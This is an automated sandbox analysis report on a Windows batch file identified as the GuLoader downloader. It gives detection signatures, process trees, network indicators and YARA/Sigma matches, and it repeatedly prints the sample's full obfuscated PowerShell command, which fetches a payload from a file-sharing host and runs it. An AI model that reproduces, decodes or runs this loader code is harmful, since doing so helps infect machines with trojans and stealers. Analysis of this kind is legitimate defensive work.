Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
kam.cmd

Overview

General Information

Sample name:kam.cmd
Analysis ID:1446778
MD5:37b176c0abc29ec74dede88ced6e4cf1
SHA1:4aed169208162c12f26dfbe68e94e6781afcc47e
SHA256:7a5335537efdf7a6becc59c61912dd6b2b56ac7a2e9315b32a0dc3f8ac500fc5
Tags:cmd
Infos:

Detection

GuLoader
Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Yara detected GuLoader
Yara detected Powershell download and execute
Found suspicious powershell code related to unpacking or dynamic code loading
Suspicious powershell command line found
Very long command line found
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • cmd.exe (PID: 5084 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\kam.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 5256 cmdline: powershell.exe -windowstyle hidden "$Kiaki = 1;$Vaabenmnd='Sub';$Vaabenmnd+='strin';$Vaabenmnd+='g';Function Hystadens($Rivalled){$Kortende=$Rivalled.Length-$Kiaki;For($Ransagningskendelsens=5;$Ransagningskendelsens -lt $Kortende;$Ransagningskendelsens+=6){$Indervrelses+=$Rivalled.$Vaabenmnd.Invoke( $Ransagningskendelsens, $Kiaki);}$Indervrelses;}function Billedhuggeren($Dmpningsfaktorernes){&($Searchlights) ($Dmpningsfaktorernes);}$Maimon=Hystadens 'skurvMSekuno Ko,tzplotti Carbl linelAdkvaaKommu/Super5ov,rl. Stje0un ud Karma( .ropWWagwiiPyruvnSyfildTelefoMultiwbrk.osUnpau artiN FibuT orma f,rly1Sj.eg0D,spe. heda0 Loya;A,fot GramWU.kamiStudin Poli6Skatt4Hoard;Bagst Svi.ex Klem6 Sale4Ambis; ,res .onocrFedervFasci:An,at1Nords2.tent1Doven.oopho0Frkap)Co cl ReturGTampoeSn,escSundhk krifocentr/Kigho2 .ooc0Radio1Mo.kr0Merce0Cents1Engol0 nthr1Leuco sn.sFKundsiMy,omr MicreVeterfOptimoLyst xR,pag/ ,xam1Knipl2 Sloo1Thwar. rore0 Trus ';$Cleanlier245=Hystadens ' overU Sam,sStangefi.dyrSta n-C,ookAHamarg nstaeSnavenPrecotisoan ';$Outgnaw=Hystadens ' .redhHaematsnappt Svkkp DiplsYe.rn:Recip/.edtp/Aa dvwS rafwsp,rtw Ta.r. H,lbsAntileEjendnUgunsdH ssesSockhpDuo eaiac.hcSe,sieCockm.Dand,cTe.rio MostmPaleo/S ubopUnvolrA.totoBeton/Gstg d R.sll .nsa/Intero eriegSemicmshivo6FjernqSlagtcPhilt ';$Kragerede=Hystadens 'Proph>Knuck ';$Searchlights=Hystadens ' genni AfteeTr,nsxOutto ';$Eradicated='Tj';$Unvision = Hystadens 'finaneUpayacFrotth nonvoS.bma Balsa%Mise aCamoupUnd,spFor,jdO.ercaOverbtDaab,aIrous% ,eds\cam uT TelecRecr,h Non,i laskcResi.kSanit.El phITena.tTrkvoeXylog Pla i& Benm&Foreg Tur.ueTillbcungulhCliteoHabuk Th nkt Epis ';Billedhuggeren (Hystadens ' Trde$AnnamgVin alvoldto Sul,b .orka .elilSting:GraphBSpasmoUdbl r Acrad.uldsi,eerbnSpatlgS.sed= Su a(BuffwcFro bmXylogdSagvo Primr/DobbecEksdi Drugg$DekleULmarkn Jun.vMuslii VentsBekl.iRut foRigkenGeoem)No di ');Billedhuggeren (Hystadens 'Manip$ paitgHyperl.nedkoPetrobP,epra ydrolI.ter:D lesJtenora.ransr AsienMang.oNg,el=A,sin$TerraOReuneuLabyrt E engnonvenG isoaBullfwT ngh.Engels.emoupGaperlTelefiZolaet Anlg( Pla.$Unf oKPr,rerDisora.ftergLys ieBism,rSlambeHipbodChople .ass) Incu ');$Outgnaw=$Jarno[0];$Cardiospermum= (Hystadens '.isas$UnanigProbalKart oS,inebmi,rea,lerflRetic:RulleSReinseOpslucSt rerEudioeLleuft PortsArbit=YahunN EpiteGala wLamfl-ForglO TilkbCl doj flogeArgotcU.yret Kvle ModarSPrivayfyldesReckotNyctaeInformsamme. unmuNkomm,eRelattPrein.Op.trWbombee Va.sbFjernCNoncolCabuliTroldeUncomnHomoet');$Cardiospermum+=$Bording[1];Billedhuggeren ($Cardiospermum);Billedhuggeren (Hystadens 'Outga$StenoSTurfieKod.scP,ixnr ontreR.tactHyd.osCauli. p.cnHharcee Smaga,olysdFloveeDomparAnalesPeize[M rge$.ndekCLgteslFrem,eindtraCloddnLo qulPorcuiNo voeAlacrrNonte2 Tols4 Ante5redni] Syld=campe$MeccaM Fraga,ilgaiLargemYo.kloJ.rdfnMel,e ');$Jumped=Hystadens 'Genn,$OctacSTraade Unsuc TarbrFirmaePhysitNyskasBoo.t.AfvrgDHankaoJust,wArtisn CalylCremaoA.kylaDryerdNonbuFNedgjiBeskrlSvigeeSemif( Ar,f$Sa.meOVejrtuHoejetUnchagA.lytnAd esaAti.gwPyr b,Inbr.$Sili.TNaphte Mdepowell,sJubiloParalf i htfSkudaeSe.esnP mpssValid) mr,l ';$Teosoffens=$Bording[0];Billedhuggeren (Hystadens ' Jack$UltragImbo.lAggreoEnf.vb Fyrta ScanlDumpi:SlurbF,ydisoMud ovgangle RbedoMedi l rgehaWi.letandenetrold= Helt(SemicTNonineS.afnsMirkstEurop-Pri,sPAgiosaKalort Triph.nsin Meiop$VelvaTTra,deSa.enoGrithsLate,ochuckf HjemfProtoeLigkinFa.ersNedsn)Do,um ');while (!$Foveolate) {Billedhuggeren (Hystadens 'Bug e$ErkyngArbe.lForsooCholebStormaSwlealClo h:Fj.nthPolsgu UnwisPistabBalbroKollin ,avld.nengr ankeeArbe tNonc =Fejls$Paus tGendirSinuauRustneM lli ') ;Billedhuggeren $Jumped;Billedhuggeren (Hystadens 'PatenS HypotMarkea SporrB ggetP lse-Zit aSNoaltl ,ataeSpongeBenzipBundf Serri4Domme ');Billedhuggeren (Hystadens 'Fremd$ D,sogEfterl OveroZest,bTressaChur,lOplad:,dervFUraadoAmak vSignaeUvennoFr,mslGenlyaPallatConteeh.spa= Cycl(I.rigTFiefdeHypoasRugkit Over-InsecP PrelaData,tParchh Care Ginse$AdeesTMulseeShlepo NedssKnibtoVejr f GlotfKommae,ishtnCh essDrvpa)Grum ') ;Billedhuggeren (Hystadens 'Ihrd $VrelsgL.quilForsvoSan tbUncreaTorywlSamvr: TurbHReaccjArcadr R,ine ,oelaOst.afMckenlNyv,reTalefdMilienartsfiSensinL.fayg Ek,ps Im r=lngde$UnautgZaphrlScrapoBajonbCo,ciaIsognlHo,ot:UdsprFLaxnei.heels S,uakI dfre xumbr Popuigip.nmMembrian.grnForbei MaarsUdbrdt AugueLft.brAmph iIndsteTrol rServenLyoneeVaretsExten+Terre+Firma%Hikha$DllesJMetriaHap ir subsnNon uoMeteo. S.utcFetico Bothu AmalnComb,tD.ivb ') ;$Outgnaw=$Jarno[$Hjreaflednings];}$Sanitetsvsenernes=303750;$Rehaul=27249;Billedhuggeren (Hystadens 'Europ$DecimgForunlCellioP.ecob WitnaSrskalAlarm:TyverZOrkidaGa,kanInt gnIndtre RodfsTarmp Diegi=Klods ,remsGOmnumeBarost,ophu-UnsadCpaatroRansanAllo,tBasile Bitrn FifotContu Brnde$ lkreT tandeOme eoprosisAutoboFavorf Polyfs,erteDe ronDermisBri a ');Billedhuggeren (Hystadens 'Ba ca$DriftgPilkolLithooTaksebTilkeaGratil bu i:PelsePUdplarLi.jeo B,igfTestde ubansStngnsSoergi.ftero Disan Plade Lan,l Thor Ascid=Tr kk Mecop[ ymfoS Chefy HooksSpandtFcpaue imebm.arto.H,dadC.iscooAp linSverivRuffle Sungr PraetEfter] Hebr:Disna:,ctinFConterConquo S.bsm ExflB HalvaMe iosVallaebeh.n6 Yndi4Unv sSSucc.tP,eumrInteriPrearnEcphogZ,rib(Refec$.lshaZInviaaFras.n ForsnRosineSan,esQuadr)skram ');Billedhuggeren (Hystadens 'Mrk i$Meditg,kovdlTraveoSamarbSvagsaVe.galPr.pl:FodfoP hretuPrec sManu,s Ar.ylDej,geBilleyDompr Teary=Tameh Defib[Tapr,S HoneyTi,ris ,ksktPari,e ,konmcr,me.BitteTHlereeSchelxU tratRinch.ravnsEFreshnIntercBa ndoHusvidNonreiPoikinSadhegAnili]F.der:Desua:CatadASmkl,SUdklaCGreb.IStvniIIvori.HundeGAkadeeCussetHjlp SHy.tetSpermrArabeiModernM,xomgTre,s(Indek$Li sePPetitrdecreodrevefSvinee D,gosBuk,hszwzriiSuperoEmb,lnRidd e,prdelHovet) Int, ');Billedhuggeren (Hystadens ' regn$prel g OrgilBeclooPageabDykkeaCal,alTrodd:Mi.roPCompuapens pDecadi Ma.grPraamaBuln r ,inakKonsti,ilflvTermi6 P,er1Sover= bea.$PolygPFor,tuXenogs MiddsR.klalSolise Shony Dep . Pes sMorsiuUigenbRlin,sPensutShopbrFiskeiOrnitnrickagDem.r(Topog$Unde.S ommaa.kistn .eski redjtManifeBrne,tPredis ra ivU skrsF lkeeFo,danAgrose.ntrerHebranGal eebackbs ,oci, ,aan$DukseR Op.yeF gbghU.artaSqu ruStbnilco.ro) Loui ');Billedhuggeren $Papirarkiv61;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 4292 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 4424 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Tchick.Ite && echo t" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.2139881223.00000289B4A73000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
    Process Memory Space: powershell.exe PID: 5256JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
      Process Memory Space: powershell.exe PID: 5256INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
      • 0xd5704:$b2: ::FromBase64String(
      • 0xd5740:$b2: ::FromBase64String(
      • 0xd577d:$b2: ::FromBase64String(
      • 0xd57bb:$b2: ::FromBase64String(
      • 0xd57fa:$b2: ::FromBase64String(
      • 0xd583a:$b2: ::FromBase64String(
      • 0xd587b:$b2: ::FromBase64String(
      • 0xd58bd:$b2: ::FromBase64String(
      • 0xd5900:$b2: ::FromBase64String(
      • 0x304075:$b2: ::FromBase64String(
      • 0xb276:$s1: -join
      • 0x1834b:$s1: -join
      • 0x1b71d:$s1: -join
      • 0x1bdcf:$s1: -join
      • 0x1d8c0:$s1: -join
      • 0x1fac6:$s1: -join
      • 0x202ed:$s1: -join
      • 0x20b5d:$s1: -join
      • 0x21298:$s1: -join
      • 0x212ca:$s1: -join
      • 0x21312:$s1: -join

      Other

      SourceRuleDescriptionAuthorStrings
      amsi64_5256.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
        amsi64_5256.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
        • 0xe043:$b2: ::FromBase64String(
        • 0xd09a:$s1: -join
        • 0x6846:$s4: +=
        • 0x6908:$s4: +=
        • 0xab2f:$s4: +=
        • 0xcc4c:$s4: +=
        • 0xcf36:$s4: +=
        • 0xd07c:$s4: +=
        • 0xf4ff:$s4: +=
        • 0xf57f:$s4: +=
        • 0xf645:$s4: +=
        • 0xf6c5:$s4: +=
        • 0xf89b:$s4: +=
        • 0xf91f:$s4: +=
        • 0xd850:$e4: Get-WmiObject
        • 0xda3f:$e4: Get-Process
        • 0xda97:$e4: Start-Process

        Sigma Signatures

        System Summary

        barindex
        Sigma detected: Non Interactive PowerShell Process Spawned
        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -windowstyle hidden "$Kiaki = 1;$Vaabenmnd='Sub';$Vaabenmnd+='strin';$Vaabenmnd+='g';Function Hystadens($Rivalled){$Kortende=$Rivalled.Length-$Kiaki;For($Ransagningskendelsens=5;$Ransagningskendelsens -lt $Kortende;$Ransagningskendelsens+=6){$Indervrelses+=$Rivalled.$Vaabenmnd.Invoke( $Ransagningskendelsens, $Kiaki);}$Indervrelses;}function Billedhuggeren($Dmpningsfaktorernes){&($Searchlights) ($Dmpningsfaktorernes);}$Maimon=Hystadens 'skurvMSekuno Ko,tzplotti Carbl linelAdkvaaKommu/Super5ov,rl. Stje0un ud Karma( .ropWWagwiiPyruvnSyfildTelefoMultiwbrk.osUnpau artiN FibuT orma f,rly1Sj.eg0D,spe. heda0 Loya;A,fot GramWU.kamiStudin Poli6Skatt4Hoard;Bagst Svi.ex Klem6 Sale4Ambis; ,res .onocrFedervFasci:An,at1Nords2.tent1Doven.oopho0Frkap)Co cl ReturGTampoeSn,escSundhk krifocentr/Kigho2 .ooc0Radio1Mo.kr0Merce0Cents1Engol0 nthr1Leuco sn.sFKundsiMy,omr MicreVeterfOptimoLyst xR,pag/ ,xam1Knipl2 Sloo1Thwar. rore0 Trus ';$Cleanlier245=Hystadens ' overU Sam,sStangefi.dyrSta n-C,ookAHamarg nstaeSnavenPrecotisoan ';$Outgnaw=Hystadens ' .redhHaematsnappt Svkkp DiplsYe.rn:Recip/.edtp/Aa dvwS rafwsp,rtw Ta.r. H,lbsAntileEjendnUgunsdH ssesSockhpDuo eaiac.hcSe,sieCockm.Dand,cTe.rio MostmPaleo/S ubopUnvolrA.totoBeton/Gstg d R.sll .nsa/Intero eriegSemicmshivo6FjernqSlagtcPhilt ';$Kragerede=Hystadens 'Proph>Knuck ';$Searchlights=Hystadens ' genni AfteeTr,nsxOutto ';$Eradicated='Tj';$Unvision = Hystadens 'finaneUpayacFrotth nonvoS.bma Balsa%Mise aCamoupUnd,spFor,jdO.ercaOverbtDaab,aIrous% ,eds\cam uT TelecRecr,h Non,i laskcResi.kSanit.El phITena.tTrkvoeXylog Pla i& Benm&Foreg Tur.ueTillbcungulhCliteoHabuk Th nkt Epis ';Billedhuggeren (Hystadens ' Trde$AnnamgVin alvoldto Sul,b .orka .elilSting:GraphBSpasmoUdbl r Acrad.uldsi,eerbnSpatlgS.sed= Su a(BuffwcFro bmXylogdSagvo Primr/DobbecEksdi Drugg$DekleULmarkn Jun.vMuslii VentsBekl.iRut foRigkenGeoem)No di ');Billedhuggeren (Hystadens 'Manip$ paitgHyperl.nedkoPetrobP,epra ydrolI.ter:D lesJtenora.ransr AsienMang.oNg,el=A,sin$TerraOReuneuLabyrt E engnonvenG isoaBullfwT ngh.Engels.emoupGaperlTelefiZolaet Anlg( Pla.$Unf oKPr,rerDisora.ftergLys ieBism,rSlambeHipbodChople .ass) Incu ');$Outgnaw=$Jarno[0];$Cardiospermum= (Hystadens '.isas$UnanigProbalKart oS,inebmi,rea,lerflRetic:RulleSReinseOpslucSt rerEudioeLleuft PortsArbit=YahunN EpiteGala wLamfl-ForglO TilkbCl doj flogeArgotcU.yret Kvle ModarSPrivayfyldesReckotNyctaeInformsamme. unmuNkomm,eRelattPrein.Op.trWbombee Va.sbFjernCNoncolCabuliTroldeUncomnHomoet');$Cardiospermum+=$Bording[1];Billedhuggeren ($Cardiospermum);Billedhuggeren (Hystadens 'Outga$StenoSTurfieKod.scP,ixnr ontreR.tactHyd.osCauli. p.cnHharcee Smaga,olysdFloveeDomparAnalesPeize[M rge$.ndekCLgteslFrem,eindtraCloddnLo qulPorcuiNo voeAlacrrNonte2 Tols4 Ante5redni] Syld=campe$MeccaM Fraga,ilgaiLargemYo.kloJ.rdfnMel,e ');$Jumped=Hystadens 'Genn,$OctacSTraade Unsuc TarbrFirmaePhysitNyskasBoo.t.AfvrgDHankaoJust,wArtisn CalylCremaoA.kylaDryerdNonbuFNedgjiBeskrlSvigeeSemif( Ar,f$Sa.meOVejr

        Snort Signatures

        No Snort rule has matched

        Joe Sandbox Signatures

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Antivirus detection for URL or domain
        Source: http://pesterbdd.com/images/Pester.pngURL Reputation: Label: malware
        Source: unknownHTTPS traffic detected: 172.67.170.105:443 -> 192.168.2.5:49704 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 69.31.136.53:443 -> 192.168.2.5:49705 version: TLS 1.2
        Source: Binary string: CallSite.Target.pdb source: powershell.exe, 00000002.00000002.2149102910.00000289BCD34000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.2147314316.00000289BCBBE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000002.00000002.2149102910.00000289BCD34000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: mscorlib.pdb source: powershell.exe, 00000002.00000002.2120457233.00000289A2A3C000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: System.Core.pdbID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000002.00000002.2120457233.00000289A2A3C000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: Qib.pdb[ source: powershell.exe, 00000002.00000002.2147314316.00000289BCBBE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: ion.pdb source: powershell.exe, 00000002.00000002.2149102910.00000289BCD96000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: m.Core.pdbL source: powershell.exe, 00000002.00000002.2147314316.00000289BCBBE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: embly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000002.00000002.2149102910.00000289BCD34000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: *on.pdb source: powershell.exe, 00000002.00000002.2149102910.00000289BCD34000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000002.00000002.2149102910.00000289BCD34000.00000004.00000020.00020000.00000000.sdmp
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
        Source: Joe Sandbox ViewIP Address: 172.67.170.105 172.67.170.105
        Source: Joe Sandbox ViewIP Address: 69.31.136.53 69.31.136.53
        Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
        Source: global trafficHTTP traffic detected: GET /pro/dl/ogm6qc HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.sendspace.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /dlpro/6afd7b9629aca833864bae4c7487d4d4/664f9301/ogm6qc/Potentialet.mso HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: fs12n5.sendspace.comConnection: Keep-Alive
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficHTTP traffic detected: GET /pro/dl/ogm6qc HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.sendspace.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /dlpro/6afd7b9629aca833864bae4c7487d4d4/664f9301/ogm6qc/Potentialet.mso HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: fs12n5.sendspace.comConnection: Keep-Alive
        Source: global trafficDNS traffic detected: DNS query: www.sendspace.com
        Source: global trafficDNS traffic detected: DNS query: fs12n5.sendspace.com
        Source: global trafficDNS traffic detected: DNS query: 50.23.12.20.in-addr.arpa
        Source: powershell.exe, 00000002.00000002.2120955065.00000289A67E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fs12n5.sendspace.com
        Source: powershell.exe, 00000002.00000002.2139881223.00000289B4A73000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
        Source: powershell.exe, 00000002.00000002.2120955065.00000289A4C2D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
        Source: powershell.exe, 00000002.00000002.2120955065.00000289A4A01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: powershell.exe, 00000002.00000002.2120955065.00000289A4C2D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
        Source: powershell.exe, 00000002.00000002.2120955065.00000289A67A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sendspace.com
        Source: powershell.exe, 00000002.00000002.2120955065.00000289A4A01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
        Source: powershell.exe, 00000002.00000002.2139881223.00000289B4A73000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
        Source: powershell.exe, 00000002.00000002.2139881223.00000289B4A73000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
        Source: powershell.exe, 00000002.00000002.2139881223.00000289B4A73000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
        Source: powershell.exe, 00000002.00000002.2120955065.00000289A67CE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fs12n5.sendspaX
        Source: powershell.exe, 00000002.00000002.2120955065.00000289A67CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2120955065.00000289A4E95000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fs12n5.sendspace.com
        Source: powershell.exe, 00000002.00000002.2120955065.00000289A67CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2120955065.00000289A67A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2120955065.00000289A4E95000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2120955065.00000289A67CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2120955065.00000289A4E91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fs12n5.sendspace.com/dlpro/6afd7b9629aca833864bae4c7487d4d4/664f9301/ogm6qc/Potentialet.mso
        Source: powershell.exe, 00000002.00000002.2120955065.00000289A4C2D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
        Source: powershell.exe, 00000002.00000002.2120955065.00000289A5DDC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
        Source: powershell.exe, 00000002.00000002.2139881223.00000289B4A73000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
        Source: powershell.exe, 00000002.00000002.2120955065.00000289A62C2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2120955065.00000289A4E3B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.sendspace.com
        Source: powershell.exe, 00000002.00000002.2120955065.00000289A4C2D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.sendspace.com/pro/dl/ogm6qcP
        Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
        Source: unknownHTTPS traffic detected: 172.67.170.105:443 -> 192.168.2.5:49704 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 69.31.136.53:443 -> 192.168.2.5:49705 version: TLS 1.2

        System Summary

        barindex
        Malicious sample detected (through community Yara rule)
        Source: amsi64_5256.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
        Source: Process Memory Space: powershell.exe PID: 5256, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
        Very long command line found
        Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 6192
        Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 6192Jump to behavior
        Source: amsi64_5256.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
        Source: Process Memory Space: powershell.exe PID: 5256, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
        Source: classification engineClassification label: mal84.troj.evad.winCMD@7/6@3/2
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Tchick.IteJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:984:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4292:120:WilError_03
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tc2pmvdp.lku.ps1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
        Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\kam.cmd" "
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Kiaki = 1;$Vaabenmnd='Sub';$Vaabenmnd+='strin';$Vaabenmnd+='g';Function Hystadens($Rivalled){$Kortende=$Rivalled.Length-$Kiaki;For($Ransagningskendelsens=5;$Ransagningskendelsens -lt $Kortende;$Ransagningskendelsens+=6){$Indervrelses+=$Rivalled.$Vaabenmnd.Invoke( $Ransagningskendelsens, $Kiaki);}$Indervrelses;}function Billedhuggeren($Dmpningsfaktorernes){&($Searchlights) ($Dmpningsfaktorernes);}$Maimon=Hystadens 'skurvMSekuno Ko,tzplotti Carbl linelAdkvaaKommu/Super5ov,rl. Stje0un ud Karma( .ropWWagwiiPyruvnSyfildTelefoMultiwbrk.osUnpau artiN FibuT orma f,rly1Sj.eg0D,spe. heda0 Loya;A,fot GramWU.kamiStudin Poli6Skatt4Hoard;Bagst Svi.ex Klem6 Sale4Ambis; ,res .onocrFedervFasci:An,at1Nords2.tent1Doven.oopho0Frkap)Co cl ReturGTampoeSn,escSundhk krifocentr/Kigho2 .ooc0Radio1Mo.kr0Merce0Cents1Engol0 nthr1Leuco sn.sFKundsiMy,omr 